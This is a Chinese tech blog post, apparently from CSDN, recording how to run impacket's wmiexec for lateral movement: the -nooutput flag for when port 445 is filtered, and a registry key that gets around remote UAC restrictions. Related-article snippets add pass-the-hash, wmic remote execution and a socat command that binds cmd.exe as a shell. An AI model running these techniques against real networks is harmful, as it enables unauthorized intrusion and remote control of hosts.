python wmiexec_impacket远程命令执行记录

最新推荐文章于 2025-05-29 13:04:39 发布
最新推荐文章于 2025-05-29 13:04:39 发布
阅读量2.1k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
文章标签: python wmiexec
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39605840/article/details/111852937
本文记录了使用impacket的wmiexec模块进行远程命令执行的过程,包括如何处理445端口被防火墙过滤的问题。通过`-nooutput`参数可以避免依赖445端口并减少回显。同时,文章提到了UAC(用户账户控制)对横向移动的影响,特别是在工作组和域环境中的不同表现,并指出在非RID 500的本地管理员账户下需要调整注册表设置以绕过Access is Denied错误。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

impacket远程命令执行记录

在横向移动的时候常常会遇到目标445端口被防火墙过滤的情况,那么我们就需要通过其他端口进行横向移动。

之前对impacket中远程命令执行的帮助文件看的不是很透彻,导致掉坑里。

wmiexec&dcomexec

正常我们使用wmiexec、dcomexec的时候,命令会这样写,会回显执行结果。这时wmiexec、dcomexec会使用135、445端口,但如果目标445端口被防火墙过滤就会导致远程命令执行失败。

1python wmiexec.py administrator@172.16.102.135 "whoami"

后续发现有一个参数叫-nooutput就可以解决这样的情况,这时wmiexec、dcomexec仅仅会使用135端口,但是不会有回显。有些时候很有必要把debug打开。

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-debug]

[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]

target [command [command ...]]

Executes a semi-interactive shell using Windows Management Instrumentation.

positional arguments:

target [[domain/]username[:password]@]

command command to execute at the target. If empty it will

launch a semi-interactive shell

optional arguments:

-h, --help show this help message and exit

-share SHARE share where the output will be grabbed from (default

ADMIN$)

-nooutput whether or not to print the output (no SMB connection

created)

-debug Turn DEBUG output ON

authentication:

-hashes LMHASH:NTHASH

NTLM hashes, format is LMHASH:NTHASH

-no-pass don't ask for password (useful for -k)

-k Use Kerberos authentication. Grabs credentials from

ccache file (KRB5CCNAME) based on target parameters.

If valid credentials cannot be found, it will use the

ones specified in the command line

-aesKey hex key AES key to use for Kerberos Authentication (128 or 256

bits)

感觉这张图总结的很好,喜欢了😍

UAC

在横向移动的时候我们也常常会遇到UAC的问题,rpc_s_access_denied是我们不愿意看到的。

主要分为两种情况:工作组、域

工作组:

对于任何非RID 500的本地管理员(Administrator)连接到WIndows Vista+的计算机,无论是采用WMI、PSexec还是其他方法,使用的令牌都是”已经过滤过的”(即中等令牌)。当使用上述命令进行链接的时候会显示Access is Denied。

在工作组的情况,我们需要使用RID 500的Administrator才可以成功。如果想要在非RID 500的账户测试,需要更改一下注册表。

1HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy

域:

我记得在域的环境下,貌似远程UAC是不一样的,具体的忘记了,后续补一下。

Respect

[横向移动] WMIC 远程命令执行横向移动
Blue17 の 小窝
03-20 1047
0x01:WMIC 工具介绍🌟0x01:WMIC 工具介绍WMI 是 Windows 在 PowerShell 还未发布前,微软用来管理 Windows 系统的重要数据库工具,WMI 本身的组织架构是一个数据库架构,WMI 使用 DCOM 或 WinRM 协议,自从 PsExec 在内网中被严格监控后,越来越多的反病毒厂商将 PsExec 加入了黑名单,于是黑客们渐渐开始使用 WMI 进行横向移动。
Linux 远程连接Windows执行命令方法总结
sojrs_sec的博客
09-20 6163
winexe winexe在kali里面自带,用于在linux平台连接windows机器 环境要求:开启文件共享,即smb服务;禁用UAC远程限制 pth-winexe -U username%password //remote_ip cmd.exe --system 支持ntlm hash直接登录 若报错 E_md4hash wrapper called. ERROR: CreateSe...
Python利用WMI实现ping命令的例子
09-18
今天小编就为大家分享一篇Python利用WMI实现ping命令的例子,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
python wmiexec_python impacket
weixin_39692245的博客
12-22 429
参考链接:https://www.freebuf.com/news/175208.htmlhttps://ares-x.com/2020/03/21/%E5%9F%9F%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%EF%BC%88%E5%85%AD%EF%BC%89PTH-%E5%93%88%E5%B8%8C%E4%BC%A0%E9%80%92%E6%94%BB%E5%...
Impacket工具集详解:内网渗透(域渗透)攻击神器
最新发布
vortex5的博客
05-29 1471
Impacket 是一个强大的 Python 工具集,专注于网络协议交互与 Windows 域渗透,广泛应用于安全测试和红队行动。它支持 SMB、Kerberos、NTLM 等协议,提供远程执行(如 psexec.py、wmiexec.py)、票据操作(GetTGT.py、ticketer.py)和凭据提取(secretsdump.py)等功能。安装简便,通过 Python 运行,适用于多种操作系统。典型应用场景包括域渗透、横向移动和密码提取,其隐蔽性高,模块化设计便于定制攻击链。
python wmiexec_WMI在渗透测试中的重要性
weixin_39645249的博客
12-22 742
0x01首先什么是WMI?WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。WMI在渗透测试中的价值在于它不需要下载和安装, 因为WMI是Windows系统自带功能。而且整个运行过程都在计算机内存中发生,不会留下任何痕迹。这一点是其它渗透测试工具所不能相比的。图片来源: msdn.microsoft.com0x02检索系统信息1.检...
python 远程_Python操作远程机器
weixin_39840606的博客
02-09 228
操作远程机器主要使用的有paramiko,WMI(Windows Management Instrumentation),SMBConnection.paramikoparamiko使用SSH2协议操作远程机器,是Python语言写的一个模块。安装pip install paramiko使用使用主要包括执行命令,上传文件和下载文件。连接有两种方式连接到linux服务器。方式一:ssh = par...
wmiexec.py分析
sagic的博客
11-13 380
协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送session setup request请求数据报实现的。客户端发送一对用户名和密码或一个简单密码到服务器。然后服务器通过发送一个Session setup response应答数据报来允许或拒绝本次连接。首先客户端发送一个SMB请求数据报,列出它所支持的所有SMB协议版本。外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传。服务器收到请求信息后响应请求,并列出希望使用的协议版本。日志内容为 登录、特殊登录日志。
python wmiexec_内网渗透之域渗透命令执行总结
weixin_39633976的博客
12-22 2402
前言AD的全称是Active Directory:活动目录域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后两个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。在域渗透场景...
impacket安装 python_Impacket网络协议工具包介绍
weixin_39614637的博客
02-06 925
Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。在本文的实验场景中,我们需要准备以下两个系统:1.配置域控的Windows服务器;2. Kali Linux系统相关设置如下:Windows Server域: ...
第129天:内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
weixin_71529930的博客
08-07 1335
这里这个环境继续上一篇文章搭建的环境。
内网横移之WMIexec
Canterlot的博客
09-04 5068
本文详细介绍了WMIexec的运行原理及特点,命令执行过程,相关工具用法等
WMI的使用
weixin_45007073的博客
08-01 3102
WMI介绍基本命令 介绍 WMI的全名为"Windows Management Instrumentation"。从win8后,Windows操作系统都支持WMI,WMI可以在本地或者远程管理计算机系统。 自从PsExec在内网中被严格监控后,越来越多的反病毒厂商将PsExec加入了黑名单,于是乎攻击者转向使用WMI进行横向移动。在渗透时发现,在使用wmiexec进行横向移动时,Windows操作系统默认不会将WMI的操作记录在日志中。因为这个过程不会记录日志,所以对蓝队来说大大增加了溯源的成本。对攻击者来
Impacket工具中的横向渗透利器及其使用场景对比详解(psexec、smbexec、wmiexec、dcomexec、atexec)
vortex5的博客
03-07 1405
在渗透测试中,横向移动(Lateral Movement)是指攻击者在获得一个系统的控制权限后,通过网络进一步渗透到其他系统的过程。Impacket 是一款强大的渗透测试工具集,提供了多种实现横向渗透的脚本,常见的工具包括 、、、 和 。尽管这些工具都可以执行远程命令,但它们在工作原理、依赖的服务以及使用条件上有显著差异。下面我们将对这些工具进行详细的对比分析。 是 Impacket 中非常经典的工具,仿照了 Microsoft 的 工具。它通过 SMB(Server Message Block)协议和
【内网安全-横向移动】WMI-WMIC命令&相关内网工具
02-08 9457
【横向移动-WMI-WMIC命令】wmic、impacket-wmiexec、wmicmd.exe、WMIHACKER
WMIC使用
渗透之路,攻防之间皆学问
11-15 6741
远程创建进程 如下,以administrator用户连接192.168.52.140,并在机器上创建一个进程执行ipconfig命令,将结果写入c:\result.txt文本文件中:(由于wmic执行远程命令没有回显,所以要将结果写入到txt中) wmic /node:192.168.52.140 /user:administrator /password:123.com process call create "cmd.exe /c ipconfig > c:\result.txt...
Windows远程执行进程工具psexec和wmiexec介绍
测试开发小记
05-08 5264
在自动化测试或者自动化工具开发中,通常需要向其它电脑或者服务器发送指令,比如Windows发送命令到Linux服务器开启某个服务进程,或者读取状态信息,我们可以使用ssh协议实现。如果Windows主机需要发送命令到局域网内的其它Windows电脑要如何实现呢?在网络安全中称为横向移动的内网渗透方法可实现远程执行命令,横向移动工具有很多,本文介绍psexec和wmiexec这两个工具如何实现远程执行进程。
WMI使用学习笔记
crowsec
10-21 4309
本文大量参考了师傅们的文章,感谢各位师傅的帮助! WMI的全名为"Windows Management Instrumentation"。 从win98开始,Windows操作系统都支持WMI,WMI可以在本地或者远程管理计算机系统。比如:重启,关机,关闭进程,创建进程等。
内网渗透—哈希传递攻击PTH的几种方式
oiadkt的博客
03-11 1003
内网渗透—哈希传递攻击PTH的几种方式
提权工具
03-31
### 特权提升工具和技术概述 特权提升(Privilege Escalation)是指攻击者通过利用系统中的漏洞或其他手段获取更高权限的行为。以下是几种常见的特权提升技术和工具: #### 本地提权技术 本地提权通常发生在攻击者已经获得低权限访问的情况下,试图升级到管理员级别或更高的权限。 - **进程访问令牌权限提升** 这种方法涉及修改当前运行进程的访问令牌以增加权限。例如,在 Windows 平台上,可以通过操纵 `CreateProcessWithTokenW` 或其他 API 函数实现此目的[^1]。 - **Bypass User Account Control (UAC)** Bypass UAC 是一种绕过 Windows 用户账户控制机制的方法,允许程序在未提示用户授权的情况下执行高权限操作。常见技巧包括 DLL 注入、注册表劫持以及 COM 劫持等。 #### 利用已知漏洞进行远程提权 除了本地提权外,还可以通过网络服务中存在的漏洞来进行远程提权。 - **WeirdAAL 工具** WeirdAAL 可用于模拟 AWS 中的多种攻击场景,其中包括基于 CVE 的特权提升测试。例如,利用不当配置的 S3 存储桶可能导致数据泄露并间接帮助完成提权过程[^2]。 - **socat 工具绑定 Shell 提升权限** 使用 socat 创建加密连接通道可以帮助建立反向 shell 或 bind shell 来维持持久化会话,并可能进一步实施提权行动[^3]。 ```bash # Example of using socat to create a reverse shell with encryption. socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes ``` #### Impacket 套件的应用 Impacket 是一套强大的 Python 脚本集合,支持各种渗透测试活动,其中也包含了针对 Windows 环境下的 WMI 执行命令功能。 ```python from impacket.examples import wmiexec if __name__ == '__main__': executor = wmiexec.WMIEXEC('username', 'password', 'target_ip') executor.run(r'whoami /priv') # Check current privileges on the target system. ``` 上述脚本展示了如何借助 Impacket 库调用远程主机上的命令来验证现有权限状态[^5]。 #### 高级防护措施建议 为了防止恶意行为者的成功提权尝试,组织应考虑部署专门设计用来管理和监控敏感资产访问情况的产品——即 Privileged Access Management (PAM) 解决方案[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值